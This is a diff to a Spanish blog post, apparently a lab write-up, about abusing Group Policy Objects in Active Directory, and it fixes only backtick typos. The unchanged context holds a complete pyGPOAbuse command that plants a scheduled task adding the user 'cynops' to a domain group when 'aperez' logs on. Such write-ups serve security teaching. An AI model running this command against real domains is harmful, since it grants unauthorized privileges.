--- a/_posts/ES/2024-10-13-GPOAbuse.md
+++ b/_posts/ES/2024-10-13-GPOAbuse.md
@@ -66,7 +66,7 @@ Una forma de abusar de esta configuración desde `Cynops` es añadir un usuario 
    <img src="/assets/img/gpo_bloodhound3.png">
 </p>
 
-Para esto usaremos [GPOabuse](https://github.com/Hackndo/pyGPOAbuse), para este ejemplo crearemos un filtro para que solo afecte cuando se loguee el usuario `aperez`y ponga en marcha toda la maquinaria, ejecutando el comando `net.exe group empresas cynops /add /domain'
+Para esto usaremos [GPOabuse](https://github.com/Hackndo/pyGPOAbuse), para este ejemplo crearemos un filtro para que solo afecte cuando se loguee el usuario `aperez`y ponga en marcha toda la maquinaria, ejecutando el comando `net.exe group empresas cynops /add /domain`
 
 ```bash
 pygpoabuse.py brain.body/cynops -gpo-id "7856ED7B-84FA-4393-8C72-AAB8D0C92F4F" -powershell -command "net.exe group empresas cynops /add /domain" -taskname "GPOTest2" -user -dc-ip 10.0.0.254
@@ -84,7 +84,7 @@ En nuestro caso se puede ver la política añadida en la ruta del `SYSVOL` donde
 </p>
 
 
-Una vez que se aplica la política, por ejemplo logueando el usuario `aperez` que pertenece a `Psicologos`y a `añadidor`,  vemos que se ejecuta el comando puesto con el comando anterior `net.exe group empresas cynops /add /domain` por lo que al revisar el grupo vemos que el usuario `cynops` se encuentra en `el grupo `Empresas
+Una vez que se aplica la política, por ejemplo logueando el usuario `aperez` que pertenece a `Psicologos`y a `añadidor`,  vemos que se ejecuta el comando puesto con el comando anterior `net.exe group empresas cynops /add /domain` por lo que al revisar el grupo vemos que el usuario `cynops` se encuentra en el grupo `Empresas`
 
 <p align="center">
    <img src="/assets/img/Cynopswin.png">
